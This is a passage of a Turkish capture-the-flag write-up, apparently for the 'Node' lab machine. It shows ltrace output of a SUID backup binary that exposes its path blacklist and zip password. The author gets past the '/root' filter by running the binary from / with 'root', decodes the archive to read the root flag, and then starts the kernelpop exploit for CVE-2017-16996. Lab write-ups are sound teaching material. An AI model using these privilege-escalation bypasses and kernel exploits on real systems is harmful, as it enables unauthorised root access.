tom@node:\/$ ltrace \/usr\/local\/bin\/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/home\/tom\/user.txt\n<9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/home\/tom\/user.txt  \n__libc_start_main(0x80489fd, 4, 0xff936f14, 0x80492c0 <unfinished ...>\ngeteuid()                                        = 1000\nsetuid(1000)                                     = 0\nstrcmp("-q", "-q")                               = 0\nstrncpy(0xff936dd8, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff936dd8\nstrcpy(0xff936dc1, "\/")                          = 0xff936dc1\nstrcpy(0xff936dcd, "\/")                          = 0xff936dcd\nstrcpy(0xff936d57, "\/e")                         = 0xff936d57\nstrcat("\/e", "tc")                               = "\/etc"\nstrcat("\/etc", "\/m")                             = "\/etc\/m"\nstrcat("\/etc\/m", "yp")                           = "\/etc\/myp"\nstrcat("\/etc\/myp", "la")                         = "\/etc\/mypla"\nstrcat("\/etc\/mypla", "ce")                       = "\/etc\/myplace"\nstrcat("\/etc\/myplace", "\/k")                     = "\/etc\/myplace\/k"\nstrcat("\/etc\/myplace\/k", "ey")                   = "\/etc\/myplace\/key"\nstrcat("\/etc\/myplace\/key", "s")                  = "\/etc\/myplace\/keys"\nfopen("\/etc\/myplace\/keys", "r")                  = 0x99ad008\nfgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x99ad008) = 0xff93696f\nstrcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1\nfgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x99ad008) = 0xff93696f\nstrcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0\nfgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x99ad008) = 0xff93696f\nstrcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1\nfgets("\\n", 1000, 0x99ad008)                     = 0xff93696f\nstrcspn("\\n", "\\n")                              = 0\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1\nfgets(nil, 1000, 0x99ad008)                      = 0\nstrstr("\/home\/tom\/user.txt", "..")               = nil\nstrstr("\/home\/tom\/user.txt", "\/root")            = nil\nstrchr("\/home\/tom\/user.txt", ';')                = nil\nstrchr("\/home\/tom\/user.txt", '&')                = nil\nstrchr("\/home\/tom\/user.txt", '`')                = nil\nstrchr("\/home\/tom\/user.txt", '$')                = nil\nstrchr("\/home\/tom\/user.txt", '|')                = nil\nstrstr("\/home\/tom\/user.txt", "\/\/")               = nil\nstrcmp("\/home\/tom\/user.txt", "\/")                = 1\nstrstr("\/home\/tom\/user.txt", "\/etc")             = nil\nstrcpy(0xff93677b, "\/home\/tom\/user.txt")         = 0xff93677b\ngetpid()                                         = 14402\ntime(0)                                          = 1625669127\nclock(0, 0, 0, 0)                                = 1865\nsrand(0x3299b689, 0xc72a607a, 0x3299b689, 0x804918c) = 0\nrand(0, 0, 0, 0)                                 = 0x3e46ace5\nsprintf("\/tmp\/.backup_1044819173", "\/tmp\/.backup_%i", 1044819173) = 23\nsprintf("\/usr\/bin\/zip -r -P magicword \/tm"..., "\/usr\/bin\/zip -r -P magicword %s "..., "\/tmp\/.backup_1044819173", "\/home\/tom\/user.txt") = 83\nsystem("\/usr\/bin\/zip -r -P magicword \/tm"... <no return ...>\n--- SIGCHLD (Child exited) ---\n<... system resumed> )                           = 0\naccess("\/tmp\/.backup_1044819173", 0)             = 0\nsprintf("\/usr\/bin\/base64 -w0 \/tmp\/.backup"..., "\/usr\/bin\/base64 -w0 %s", "\/tmp\/.backup_1044819173") = 43\nsystem("\/usr\/bin\/base64 -w0 \/tmp\/.backup"...UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAAcqtGwp+gTiVnNFvcUs8ZqOQDSs50Dsv9+FZqgtXg21h+fhf8qZbFg01CTUbAUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= <no return ...>\n--- SIGCHLD (Child exited) ---\n<... system resumed> )                           = 0\nremove("\/tmp\/.backup_1044819173")                = 0\nfclose(0x99ad008)                                = 0\n+++ exited (status 0) +++<\/code><\/pre>\n
Birde okuyamad\u0131\u011f\u0131ma bakt\u0131m.<\/p>\n
tom@node:\/$ ltrace \/usr\/local\/bin\/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/root\n<9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 \/root               \n__libc_start_main(0x80489fd, 4, 0xff8c00d4, 0x80492c0 <unfinished ...>\ngeteuid()                                        = 1000\nsetuid(1000)                                     = 0\nstrcmp("-q", "-q")                               = 0\nstrncpy(0xff8bff98, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff8bff98\nstrcpy(0xff8bff81, "\/")                          = 0xff8bff81\nstrcpy(0xff8bff8d, "\/")                          = 0xff8bff8d\nstrcpy(0xff8bff17, "\/e")                         = 0xff8bff17\nstrcat("\/e", "tc")                               = "\/etc"\nstrcat("\/etc", "\/m")                             = "\/etc\/m"\nstrcat("\/etc\/m", "yp")                           = "\/etc\/myp"\nstrcat("\/etc\/myp", "la")                         = "\/etc\/mypla"\nstrcat("\/etc\/mypla", "ce")                       = "\/etc\/myplace"\nstrcat("\/etc\/myplace", "\/k")                     = "\/etc\/myplace\/k"\nstrcat("\/etc\/myplace\/k", "ey")                   = "\/etc\/myplace\/key"\nstrcat("\/etc\/myplace\/key", "s")                  = "\/etc\/myplace\/keys"\nfopen("\/etc\/myplace\/keys", "r")                  = 0x8e95008\nfgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x8e95008) = 0xff8bfb2f\nstrcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1\nfgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x8e95008) = 0xff8bfb2f\nstrcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0\nfgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x8e95008) = 0xff8bfb2f\nstrcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\\n") = 64\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1\nfgets("\\n", 1000, 0x8e95008)                     = 0xff8bfb2f\nstrcspn("\\n", "\\n")                              = 0\nstrcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1\nfgets(nil, 1000, 0x8e95008)                      = 0\nstrstr("\/root", "..")                            = nil\nstrstr("\/root", "\/root")                         = "\/root"\nstrcpy(0xff8beb68, "Finished! Encoded backup is belo"...) = 0xff8beb68\nprintf(" %s[+]%s %s\\n", "\\033[32m", "\\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:\n\n) = 51\nputs("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH\/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK\/oan4wWPabhw\/2rwaaJSXucU+pLgZorY67Q\/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE\/ZiS1S+rPgz\/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe\/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz\/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY\/a4AZKO\/GtVMULlrpbpIFqZ98zwmROFstmPl\/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd\/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA\/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK\/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate\/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx\/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2\/F+X\/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR\/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg\/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn\/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG\/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD\/tgtUHcFBLAQI\/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==\n)      = 1525\nexit(0 <no return ...>\n+++ exited (status 0) +++\n<\/code><\/pre>\n
G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere shared ve dinamik k\u00fct\u00fcphaneler ekrana bas\u0131ld\u0131 ve \/root ile ba\u015flayan ifadelerde program bir k\u0131r\u0131n\u0131ma u\u011fra\u0131yor gibi. Bunun \u00fczerine \/ klas\u00f6r\u00fcne gidip kodu orada \u00e7al\u0131\u015ft\u0131rd\u0131m ve sadee root demem yetti.<\/p>\n
tom@node:\/$ \/usr\/local\/bin\/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root\n<4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root                       \nUEsDBAoAAAAAAOyDI0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA0wgrFn\/oOVgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd\/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVRTFaFt1eAsAAQQAAAAABAAAAADnHzcLva1ipcpurC2xEc9mmbs9yqj9vQjmwYFRWbm87AdR7aj+5r9aorwOD7Ruh7vpmrEGsfCoUh9tLoWUvieT2xqNpbg54Pibxhv3ywYa7oKUxDZl+7H4dPw7\/\/e7XmXdpVUNP22AfyRNTHuJS5hjhPNtJ1cwPgZ3aIluFOOMNLLq5FBLBwh\/sK5kgwAAAJQAAABQSwMECgAJAAAAd7gGTZMG1zINAAAAAQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA8LFaFvLxWhbdXgLAAEEAAAAAAQAAAAAhDkadlUZJi3qb3U3ZlBLBwiTBtcyDQAAAAEAAABQSwMECgAAAAAANHwjSwAAAAAAAAAAAAAAAAwAHAByb290Ly5jYWNoZS9VVAkAA8MSrFn2vOVgdXgLAAEEAAAAAAQAAAAAUEsDBAoACQAAADR8I0sAAAAADAAAAAAAAAAgABwAcm9vdC8uY2FjaGUvbW90ZC5sZWdhbC1kaXNwbGF5ZWRVVAkAA8MSrFnDEqxZdXgLAAEEAAAAAAQAAAAAfnWgcW2tpEg9TiJIUEsHCAAAAAAMAAAAAAAAAFBLAwQKAAkAAADUfSNL8o43QC0AAAAhAAAADQAcAHJvb3Qvcm9vdC50eHRVVAkAA9AVrFkDoeVgdXgLAAEEAAAAAAQAAAAAXBr8vel8kNLZU329jcM3KQj8ViVGTXQxe\/kVpXAtBvxLZDEzRw21Dcn125p9UEsHCPKON0AtAAAAIQAAAFBLAwQUAAkACADrkVZHveUQPpsFAAAiDAAADAAcAHJvb3QvLmJhc2hyY1VUCQADqRkpVhTFaFt1eAsAAQQAAAAABAAAAAAnoMovkV12WyAcvMABtFAXnMMe\/4dz+\/N1ceZpun60VtXwX5enYDEs3quKHu7J3cW8nInOSM8P+c4ffevXwfa0yPU5SrxRjvz7l+XNhv7NWW4Uu6+cROWSg2x8Y3f3DsjwTyK6Icp2Ymh5sM10U2ZcgtcYpLfprAlWKU7rJcaGP0iqiYJICFbeOP\/S0Os6nGW3Pt2RzeuE3Kqns6GFXcIv\/+hizb8vQX+LIrOTmb66tBM2sfO6xjFUMO\/D\/CQVCYpkFCDgde3uxeVIoLaSRCgbxtS3xegUfssGk5ocm5XnXs7mDI2AcapMz85oGZm7vuzbcWJEy9QKxhotezSK3tSr0kKSYnDHltNOfvEw8DTv2m9+6VAAarcSQDgTK2gSskc6MRGE9ZLnGpMCEBB4gQt7XgdXvjL1KFeAoi2bxHEp6JAyai90UFCKpEydMpWzucuYtdWWpdmdE5M45wVvzoZszThoFhjcATZ+Fu\/OZLMxFo0SaiqrJmUl\/PFqDht4h\/EepIKAmiGYckVUlWsnNpTLnJbgsIcres5vTmz4YCqZ15tAeBEhlmCOjASgoZBRdlft8pozn67UblkSWZCyhglzGzQDBge9vf4dt+xM+AuMu5kXLssAc8DITL5ICfNaXtAUcnwIOibxBMN5wlPByPgdHhJWVykR5Z9uisu17tH068gUBxzemP55ePanipfx1BHkl0s+jq7iKoZ4S1l+ieW5ZSpF9Jj\/QNl4uXrciYw5ektLEWUVbHANKpQ4Dmrtp3vwXxCrhCnpUYPtjIijDnGymJOdyhKdxQw1yLT2hW\/emyL\/JXY4rvxqf0uDgSKwg7aksRT8ynBuHba3i+ADRApddA1WRID0bBoagH+NvzhjACW\/xroiDuxn6x8CgRGbvcjKKg4gY+PUvgY4+HGFm+CH5wLYmoo2QNk\/I0nZkCWnt34oSsHefVhSMX7EIWnd3ae++hThN35yNupi5dQQCdfNxDBoSPmXIUSjF1j3mhGtnvBcih8262MI1X5XvUGKkxw34WQUHrpYpHX3erRSsaWMIV\/5VQKynXb3UwQInQF2RIwvvrqoLKmq8Y7gbxwBrRcjs4i0piqSzwdrRYF9n2ajswFPK63cbIbOQjdTA0a\/wgDVd9JjdG1H0h\/MbDGkmDCD+KYWxt534XdmgLOxytp0erd7Vl3Y2pRnEMj4NAaARAFW6pfBWA8daiR035hb3EJsJzx5dNirKBz55xLHIq6Lz9MuxONKNDLSCK6njjfmL4ZikJdjOnYpRRwMP368qwDF3\/1VihjxuvMBx0\/OJufAHDnB5kLQYSoWImQZEtcEqmh6HHFXyJN9MQk7cE3GqFDyyFa16pAAL0+0CK5tHQhQpCT\/J6d9bxaA4wQYqxem68qeLRgl\/fOkTmSx\/ob7bmeFFY1oxahIzg6DqrjtCGWxSzVmuoXacb3mjKU\/wvWvadL3uoIsTJEEA7WrbinyZFywWAZ\/JN8AoppwKXl5weh+R2TdjIqKp9zYsVC374OhzdeUzbdQvaXZxHQ9rMN0nW9dr1KTRViBA0BzHqRugKJydPcZHxILUD70vcPGNbNhxijmaAGUsOFVkz3y6AngJ4+E44K9B\/2Bahm4EXUtPm98GW\/QMPM1xW3bydwRXtVOhtoO1Ld5tjg729wqY+S+YUfAwdAG6KgzOZ43WsMsKYDZMabmeJrUgs0SOX1k+C9iHHtgTjvDmYUgpmEgk2DNNXbmZ5bRzB+R5+WDWNVNQshja5Rb00AvZ2ah5OltkmIy2jEJC60vD7Q3UTVQ2MbcrGXAeZZVlQ4lc3SUWQMgXwKkqm\/+DZ1kz3K7LpPiAEro1ijRD7o8pAVMFS4GinEZc5jt6kDxi8X1YOX3gr+ydOaD1EAOJ0i2Tducna4SsaAIhYxeYKUS9d5OlAB6UEsHCL3lED6bBQAAIgwAAFBLAwQKAAAAAACYgCNLAAAAAAAAAAAAAAAACwAcAHJvb3QvLm5hbm8vVVQJAAMQGqxZ9rzlYHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAAsvAZN2e0fPBMAAAAHAAAAGQAcAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAkAA7TMaFunzGhbdXgLAAEEAAAAAAQAAAAASSmGqDzKWFEPPVgPj3o1xsZNuVBLBwjZ7R88EwAAAAcAAABQSwECHgMKAAAAAADsgyNLAAAAAAAAAAAAAAAABQAYAAAAAAAAABAAwEEAAAAAcm9vdC9VVAUAA0wgrFl1eAsAAQQAAAAABAAAAABQSwECHgMUAAkACADRgxFHf7CuZIMAAACUAAAADQAYAAAAAAABAAAApIE\/AAAAcm9vdC8ucHJvZmlsZVVUBQADGf7RVXV4CwABBAAAAAAEAAAAAFBLAQIeAwoACQAAAHe4Bk2TBtcyDQAAAAEAAAASABgAAAAAAAEAAACAgRkBAAByb290Ly5iYXNoX2hpc3RvcnlVVAUAA8LFaFt1eAsAAQQAAAAABAAAAABQSwECHgMKAAAAAAA0fCNLAAAAAAAAAAAAAAAADAAYAAAAAAAAABAAwEGCAQAAcm9vdC8uY2FjaGUvVVQFAAPDEqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAANHwjSwAAAAAMAAAAAAAAACAAGAAAAAAAAAAAAKSByAEAAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQFAAPDEqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAA1H0jS\/KON0AtAAAAIQAAAA0AGAAAAAAAAQAAAKCBPgIAAHJvb3Qvcm9vdC50eHRVVAUAA9AVrFl1eAsAAQQAAAAABAAAAABQSwECHgMUAAkACADrkVZHveUQPpsFAAAiDAAADAAYAAAAAAABAAAApIHCAgAAcm9vdC8uYmFzaHJjVVQFAAOpGSlWdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAAAAAAmIAjSwAAAAAAAAAAAAAAAAsAGAAAAAAAAAAQAO1BswgAAHJvb3QvLm5hbm8vVVQFAAMQGqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAALLwGTdntHzwTAAAABwAAABkAGAAAAAAAAQAAAICB+AgAAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAUAA7TMaFt1eAsAAQQAAAAABAAAAABQSwUGAAAAAAkACQADAwAAbgkAAAAAtom@node:\/$ \n<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# echo UEsDBAoAAAAAAOyDI0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA0wgrFn\/oOVgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd\/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVRTFaFt1eAsAAQQAAAAABAAAAADnHzcLva1ipcpurC2xEc9mmbs9yqj9vQjmwYFRWbm87AdR7aj+5r9aorwOD7Ruh7vpmrEGsfCoUh9tLoWUvieT2xqNpbg54Pibxhv3ywYa7oKUxDZl+7H4dPw7\/\/e7XmXdpVUNP22AfyRNTHuJS5hjhPNtJ1cwPgZ3aIluFOOMNLLq5FBLBwh\/sK5kgwAAAJQAAABQSwMECgAJAAAAd7gGTZMG1zINAAAAAQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA8LFaFvLxWhbdXgLAAEEAAAAAAQAAAAAhDkadlUZJi3qb3U3ZlBLBwiTBtcyDQAAAAEAAABQSwMECgAAAAAANHwjSwAAAAAAAAAAAAAAAAwAHAByb290Ly5jYWNoZS9VVAkAA8MSrFn2vOVgdXgLAAEEAAAAAAQAAAAAUEsDBAoACQAAADR8I0sAAAAADAAAAAAAAAAgABwAcm9vdC8uY2FjaGUvbW90ZC5sZWdhbC1kaXNwbGF5ZWRVVAkAA8MSrFnDEqxZdXgLAAEEAAAAAAQAAAAAfnWgcW2tpEg9TiJIUEsHCAAAAAAMAAAAAAAAAFBLAwQKAAkAAADUfSNL8o43QC0AAAAhAAAADQAcAHJvb3Qvcm9vdC50eHRVVAkAA9AVrFkDoeVgdXgLAAEEAAAAAAQAAAAAXBr8vel8kNLZU329jcM3KQj8ViVGTXQxe\/kVpXAtBvxLZDEzRw21Dcn125p9UEsHCPKON0AtAAAAIQAAAFBLAwQUAAkACADrkVZHveUQPpsFAAAiDAAADAAcAHJvb3QvLmJhc2hyY1VUCQADqRkpVhTFaFt1eAsAAQQAAAAABAAAAAAnoMovkV12WyAcvMABtFAXnMMe\/4dz+\/N1ceZpun60VtXwX5enYDEs3quKHu7J3cW8nInOSM8P+c4ffevXwfa0yPU5SrxRjvz7l+XNhv7NWW4Uu6+cROWSg2x8Y3f3DsjwTyK6Icp2Ymh5sM10U2ZcgtcYpLfprAlWKU7rJcaGP0iqiYJICFbeOP\/S0Os6nGW3Pt2RzeuE3Kqns6GFXcIv\/+hizb8vQX+LIrOTmb66tBM2sfO6xjFUMO\/D\/CQVCYpkFCDgde3uxeVIoLaSRCgbxtS3xegUfssGk5ocm5XnXs7mDI2AcapMz85oGZm7vuzbcWJEy9QKxhotezSK3tSr0kKSYnDHltNOfvEw8DTv2m9+6VAAarcSQDgTK2gSskc6MRGE9ZLnGpMCEBB4gQt7XgdXvjL1KFeAoi2bxHEp6JAyai90UFCKpEydMpWzucuYtdWWpdmdE5M45wVvzoZszThoFhjcATZ+Fu\/OZLMxFo0SaiqrJmUl\/PFqDht4h\/EepIKAmiGYckVUlWsnNpTLnJbgsIcres5vTmz4YCqZ15tAeBEhlmCOjASgoZBRdlft8pozn67UblkSWZCyhglzGzQDBge9vf4dt+xM+AuMu5kXLssAc8DITL5ICfNaXtAUcnwIOibxBMN5wlPByPgdHhJWVykR5Z9uisu17tH068gUBxzemP55ePanipfx1BHkl0s+jq7iKoZ4S1l+ieW5ZSpF9Jj\/QNl4uXrciYw5ektLEWUVbHANKpQ4Dmrtp3vwXxCrhCnpUYPtjIijDnGymJOdyhKdxQw1yLT2hW\/emyL\/JXY4rvxqf0uDgSKwg7aksRT8ynBuHba3i+ADRApddA1WRID0bBoagH+NvzhjACW\/xroiDuxn6x8CgRGbvcjKKg4gY+PUvgY4+HGFm+CH5wLYmoo2QNk\/I0nZkCWnt34oSsHefVhSMX7EIWnd3ae++hThN35yNupi5dQQCdfNxDBoSPmXIUSjF1j3mhGtnvBcih8262MI1X5XvUGKkxw34WQUHrpYpHX3erRSsaWMIV\/5VQKynXb3UwQInQF2RIwvvrqoLKmq8Y7gbxwBrRcjs4i0piqSzwdrRYF9n2ajswFPK63cbIbOQjdTA0a\/wgDVd9JjdG1H0h\/MbDGkmDCD+KYWxt534XdmgLOxytp0erd7Vl3Y2pRnEMj4NAaARAFW6pfBWA8daiR035hb3EJsJzx5dNirKBz55xLHIq6Lz9MuxONKNDLSCK6njjfmL4ZikJdjOnYpRRwMP368qwDF3\/1VihjxuvMBx0\/OJufAHDnB5kLQYSoWImQZEtcEqmh6HHFXyJN9MQk7cE3GqFDyyFa16pAAL0+0CK5tHQhQpCT\/J6d9bxaA4wQYqxem68qeLRgl\/fOkTmSx\/ob7bmeFFY1oxahIzg6DqrjtCGWxSzVmuoXacb3mjKU\/wvWvadL3uoIsTJEEA7WrbinyZFywWAZ\/JN8AoppwKXl5weh+R2TdjIqKp9zYsVC374OhzdeUzbdQvaXZxHQ9rMN0nW9dr1KTRViBA0BzHqRugKJydPcZHxILUD70vcPGNbNhxijmaAGUsOFVkz3y6AngJ4+E44K9B\/2Bahm4EXUtPm98GW\/QMPM1xW3bydwRXtVOhtoO1Ld5tjg729wqY+S+YUfAwdAG6KgzOZ43WsMsKYDZMabmeJrUgs0SOX1k+C9iHHtgTjvDmYUgpmEgk2DNNXbmZ5bRzB+R5+WDWNVNQshja5Rb00AvZ2ah5OltkmIy2jEJC60vD7Q3UTVQ2MbcrGXAeZZVlQ4lc3SUWQMgXwKkqm\/+DZ1kz3K7LpPiAEro1ijRD7o8pAVMFS4GinEZc5jt6kDxi8X1YOX3gr+ydOaD1EAOJ0i2Tducna4SsaAIhYxeYKUS9d5OlAB6UEsHCL3lED6bBQAAIgwAAFBLAwQKAAAAAACYgCNLAAAAAAAAAAAAAAAACwAcAHJvb3QvLm5hbm8vVVQJAAMQGqxZ9rzlYHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAAsvAZN2e0fPBMAAAAHAAAAGQAcAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAkAA7TMaFunzGhbdXgLAAEEAAAAAAQAAAAASSmGqDzKWFEPPVgPj3o1xsZNuVBLBwjZ7R88EwAAAAcAAABQSwECHgMKAAAAAADsgyNLAAAAAAAAAAAAAAAABQAYAAAAAAAAABAAwEEAAAAAcm9vdC9VVAUAA0wgrFl1eAsAAQQAAAAABAAAAABQSwECHgMUAAkACADRgxFHf7CuZIMAAACUAAAADQAYAAAAAAABAAAApIE\/AAAAcm9vdC8ucHJvZmlsZVVUBQADGf7RVXV4CwABBAAAAAAEAAAAAFBLAQIeAwoACQAAAHe4Bk2TBtcyDQAAAAEAAAASABgAAAAAAAEAAACAgRkBAAByb290Ly5iYXNoX2hpc3RvcnlVVAUAA8LFaFt1eAsAAQQAAAAABAAAAABQSwECHgMKAAAAAAA0fCNLAAAAAAAAAAAAAAAADAAYAAAAAAAAABAAwEGCAQAAcm9vdC8uY2FjaGUvVVQFAAPDEqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAANHwjSwAAAAAMAAAAAAAAACAAGAAAAAAAAAAAAKSByAEAAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQFAAPDEqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAA1H0jS\/KON0AtAAAAIQAAAA0AGAAAAAAAAQAAAKCBPgIAAHJvb3Qvcm9vdC50eHRVVAUAA9AVrFl1eAsAAQQAAAAABAAAAABQSwECHgMUAAkACADrkVZHveUQPpsFAAAiDAAADAAYAAAAAAABAAAApIHCAgAAcm9vdC8uYmFzaHJjVVQFAAOpGSlWdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAAAAAAmIAjSwAAAAAAAAAAAAAAAAsAGAAAAAAAAAAQAO1BswgAAHJvb3QvLm5hbm8vVVQFAAMQGqxZdXgLAAEEAAAAAAQAAAAAUEsBAh4DCgAJAAAALLwGTdntHzwTAAAABwAAABkAGAAAAAAAAQAAAICB+AgAAHJvb3QvLm5hbm8vc2VhcmNoX2hpc3RvcnlVVAUAA7TMaFt1eAsAAQQAAAAABAAAAABQSwUGAAAAAAkACQADAwAAbgkAAAAA | base64 -d >> root.zip\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# unzip root.zip     \nArchive:  root.zip\n   creating: root\/\n[root.zip] root\/.profile password: \n  inflating: root\/.profile           \n extracting: root\/.bash_history      \n   creating: root\/.cache\/\n extracting: root\/.cache\/motd.legal-displayed  \n extracting: root\/root.txt           \n  inflating: root\/.bashrc            \n   creating: root\/.nano\/\n extracting: root\/.nano\/search_history  \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node]\n\u2514\u2500# cd root                          \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/root]\n\u2514\u2500# ls\nroot.txt\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/node\/root]\n\u2514\u2500# cat root.txt \n1722e99ca5f353b362556a62bd5e6be0\n<\/code><\/pre>\n
G\u00fczel, art\u0131k root olal\u0131m. kernelpop is back! Makineye bu harika arac\u0131 y\u00fckledim ve boom!<\/p>\n
mark@node:\/tmp\/kernelpop$ python kernelpop.py -e CVE201716996\n\n##########################\n#  welcome to kernelpop  #\n#                        #\n# let's pop some kernels #\n##########################\n\n[*] attempting to perform exploitation with exploit CVE201716996\nWould you like to run exploit CVE201716996 on this system? (y\/n): y\n    [*] writing the exploit source to disk (\/tmp\/CVE201716996.c)\n    [*] compiling exploit CVE201716996 to \/tmp\/CVE201716996\n    [*] gcc -o \/tmp\/CVE201716996 \/tmp\/CVE201716996.c\n    [+] compilation successful!\n    [*] performing exploitation of CVE201716996\n[.] \n[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n[.] \n[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n[.] \n[*] creating bpf map\n[*] sneaking evil 